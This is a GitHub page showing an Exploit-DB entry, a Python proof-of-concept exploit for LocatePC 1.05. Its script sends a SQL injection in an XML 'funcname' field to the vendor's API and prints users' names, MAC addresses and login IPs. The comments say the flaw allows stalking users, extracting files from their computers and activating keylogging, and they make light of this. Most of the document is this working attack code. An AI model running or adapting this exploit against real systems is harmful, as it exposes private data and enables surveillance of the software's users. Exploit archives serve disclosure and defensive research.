forked from offensive-security/exploitdb
-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy path16152.py
More file actions
executable file
·39 lines (32 loc) · 1.21 KB
/
Copy path16152.py
File metadata and controls
executable file
·39 lines (32 loc) · 1.21 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
#Affected Software:
#LocatePC 1.05
#Consequences:
#Arbitrary SELECT queries against the LocatePC and "mysql" database.
#The LocatePC database contains enough information to stalk all
#users of the software. It may be possible to instruct the software
#to upload arbitrary files from each user's computer to the LocatePC
#database, and then to later extract those files from the database.
#Activating the software's keylogging functionality is both possible
#and hilarious.
#Proof of Concept:
#!/usr/bin/python
import httplib
import urllib
import xml.etree.ElementTree
h = httplib.HTTPSConnection('www.ligattsecurity.com')
p = '''<Request
funcname="uName,mac_address,last_login_ip,program_login from user
where LENGTH(last_login_ip) > 0;--"></Request>'''
h.request("POST","/locatePC/api/",p,{"ContentType":"application/x-
www-form-urlencoded"})
r = h.getresponse()
data = urllib.unquote_plus(r.read())
for i in xml.etree.ElementTree.fromstring(data).iter():
if i.tag == "Row":
print ""
elif i.tag == "Cell" and i.text != None:
print i.text
#Solution:
#DON'T USE LOCATEPC!!!
#References:
#- http://www.ligattsecurity.com/solutions/locate-pc